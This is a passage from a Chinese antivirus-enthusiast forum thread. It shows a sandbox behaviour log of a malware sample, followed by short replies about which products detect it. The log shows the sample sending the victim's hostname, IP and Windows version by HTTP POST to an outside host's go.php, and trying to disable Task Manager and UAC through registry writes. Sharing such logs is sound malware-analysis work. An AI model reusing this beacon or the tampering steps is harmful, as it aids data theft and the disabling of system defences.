11:15:20[252]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[253]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[254]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[255]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[256]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[257]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[258]:(允许)获取文件属性:C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk

11:15:20[259]:(安全环境)查找文件:C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk

11:15:20[260]:(允许)查找文件:C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk

11:15:20[261]:(允许)查找文件:C:\Windows\system32\Ras\*.pbk

11:15:20[262]:(允许)查找文件:C:\Users\wang\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk

11:15:20[263]:(允许)查找文件:C:\Users\wang\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk

11:15:20[264]:(允许)打开驱动对象:Sens

11:15:20[265]:(阻止)创建注册表键:1296\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections

11:15:20[266]:(阻止)创建注册表键:1296\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections

11:15:22[267]:(允许)创建TCP连接:186.202.153.8(IP)     端口:80

11:15:22[268]:(允许)发送封包:1300(套接字)     封包数据:GET / HTTP/1.1
Host: www.meuenderecoip.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0b8) Gecko/20100101 Firefox/4.0b8

ptions
hoForceEncodeParams     数据长度:179

1:15:27[269]:(允许)接受封包:1300(套接字)     封包数据:     数据长度:32768

11:15:27[270]:(允许)接受封包:1300(套接字)     封包数据:     数据长度:32768

11:15:27[271]:(允许)接受封包:1300(套接字)     封包数据:     数据长度:32768

11:15:27[272]:(阻止)创建注册表键:1296\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections

11:15:27[273]:(允许)创建TCP连接:186.202.153.8(IP)     端口:80

11:15:28[274]:(允许)发送封包:1324(套接字)     封包数据:GET / HTTP/1.1
Host: www.meuenderecoip.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0b8) Gecko/20100101 Firefox/4.0b8

ptions
hoForceEncodeParams     数据长度:179

1:15:35[275]:(允许)接受封包:1324(套接字)     封包数据:     数据长度:32768

11:15:35[276]:(允许)接受封包:1324(套接字)     封包数据:     数据长度:32768

11:15:35[277]:(允许)接受封包:1324(套接字)     封包数据:     数据长度:32768

11:15:35[278]:(允许)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\

11:15:35[279]:(允许)创建TCP连接:50.87.248.234(IP)     端口:80

11:15:35[280]:(允许)发送封包:1320(套接字)     封包数据:POST /images/cont/go.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 992
Host: dailydinnerclub.com
Accept: text/html
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible;Indy Library)

     数据长度:255

11:15:35[281]:(允许)发送封包:1320(套接字)     封包数据:mErro=2017%2F7%2F13+%2F+11%3A15%3A20%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Ftd%3E%3Ctd+height%3D%2210%22+bordercolor%3D%22%23990000%22+bgcolor%3D%22%23B5B29C%22%3E%3Cspan+class%3D%22style30%22%3E%26nbsp%3B%26nbsp%3B%26nbsp%3BWANG-PC%3C%2Fspan%3E%3C%2Ftd%3E%3Ctd+height%3D%2210%22+bordercolor%3D%22%23990000%22+bgcolor%3D%22%23B5B29C%22%3E%26nbsp%3B%26nbsp%3B%3Cspan+class%3D%22style29%22%3E59.50.189.39%3C%2Fs+%5C+59.50.189.39%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Fspan%3E%3C%2Ftd%3E%3Ctd+height%3D%2210%22+bordercolor%3D%22%23990000%22+bgcolor%3D%22%23B5B29C%22%3E%26nbsp%3B%26nbsp%3B%3Cspan+class%3D%22style29%22%3ENO+Plugins%21%3C%2Fspan%3E%3C%2Ftd%3E%3Ctd+height%3D%2210%22+bordercolor%3D%22%23990000%22+bgcolor%3D%22%23B5B29C%22%3E%26nbsp%3B%26nbsp%3B%3Cspan+class%3D%22style29%22%3E%3C%2Fspan%3E%3C%2Ftd%3E%3Ctd+height%3D%2210%22+bordercolor%3D%22%23990000%22+bgcolor%3D%22%23B5B29C%22%3E%26nbsp%3B%26nbsp%3B%3Cspan+class%3D%22style29%22%3EWindows+7+Ultimate+-+6.1+-+7601%3C%2Fspan%3E%3C%2Ftd%3E%3C%2Ftr%3E     数据长度:992

11:16:02[282]:(允许)接受封包:1320(套接字)     封包数据:     数据长度:32768

11:16:03[283]:(允许)接受封包:1320(套接字)     封包数据:     数据长度:32768

11:16:03[284]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\arrow1.cur

11:16:03[285]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\select1.cur

11:16:03[286]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\link1.cur

11:16:03[287]:(允许)读取文件:C:\Windows\cursors\aero_arrow.cur     访问权限:-2147483648

11:16:03[288]:(允许)读取文件:C:\Windows\cursors\aero_busy.ani     访问权限:-2147483648

11:16:03[289]:(允许)读取文件:C:\Windows\cursors\aero_up.cur     访问权限:-2147483648

11:16:03[290]:(允许)读取文件:C:\Windows\cursors\aero_nwse.cur     访问权限:-2147483648

11:16:03[291]:(允许)读取文件:C:\Windows\cursors\aero_nesw.cur     访问权限:-2147483648

11:16:03[292]:(允许)读取文件:C:\Windows\cursors\aero_ew.cur     访问权限:-2147483648

11:16:03[293]:(允许)读取文件:C:\Windows\cursors\aero_ns.cur     访问权限:-2147483648

11:16:03[294]:(允许)读取文件:C:\Windows\cursors\aero_move.cur     访问权限:-2147483648

11:16:03[295]:(允许)读取文件:C:\Windows\cursors\aero_unavail.cur     访问权限:-2147483648

11:16:03[296]:(允许)读取文件:C:\Windows\cursors\aero_working.ani     访问权限:-2147483648

11:16:03[297]:(允许)读取文件:C:\Windows\cursors\aero_helpsel.cur     访问权限:-2147483648

11:16:03[298]:(允许)读取文件:C:\Windows\cursors\aero_pen.cur     访问权限:-2147483648

11:16:03[299]:(允许)读取文件:C:\Windows\cursors\aero_link.cur     访问权限:-2147483648

11:16:03[300]:(允许)创建注册表键:HKEY_CURRENT_USER\Software

11:16:03[301]:(阻止)创建注册表键:1320\Microsoft

11:16:03[302]:(阻止)创建注册表键:1320\Windows

11:16:03[303]:(阻止)创建注册表键:1320\CurrentVersion

11:16:03[304]:(阻止)创建注册表键:1320\Policies

11:16:03[305]:(阻止)创建注册表键:1320\System

11:16:03[306]:(阻止)删除注册表值:\DisableTaskMgr

11:16:03[307]:(允许)创建注册表键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\

11:16:03[308]:(阻止)写注册表值:\DisableTaskMgr

11:16:03[309]:(阻止)窗口操作:最前显示窗口

11:16:04[310]:(阻止)窗口操作:最前显示窗口

11:16:04[311]:(阻止)窗口操作:最前显示窗口

11:16:04[312]:(阻止)窗口操作:最前显示窗口

11:16:04[313]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\regwindef.txt

11:16:04[314]:(阻止)写注册表值:\EnabledLUA

11:16:04[315]:(允许)创建注册表键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\

11:16:04[316]:(阻止)写注册表值:\DisableTaskMgr

11:16:04[317]:(允许)程序退出:File_Analysis 行为记录到此为止[/mw_shl_code]



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
aboringman
发表于 2017-7-13 16:17:16 | 显示全部楼层
墨家小子 发表于 2017-7-13 09:29
关闭卡巴云,关闭系统监控,关闭程序控制的信任数字签名,把样本拉入低限制组,然后一个新天地就粗现了[: ...

这无异于裸机双击啊,老兄,应用程序控制如果没能够有反应那就好玩了
huluntw
发表于 2017-7-14 10:12:04 | 显示全部楼层
火絨掃到
FSP 掃不到
,就一个.
发表于 2017-8-1 00:49:02 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-28 18:37 , Processed in 0.108708 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表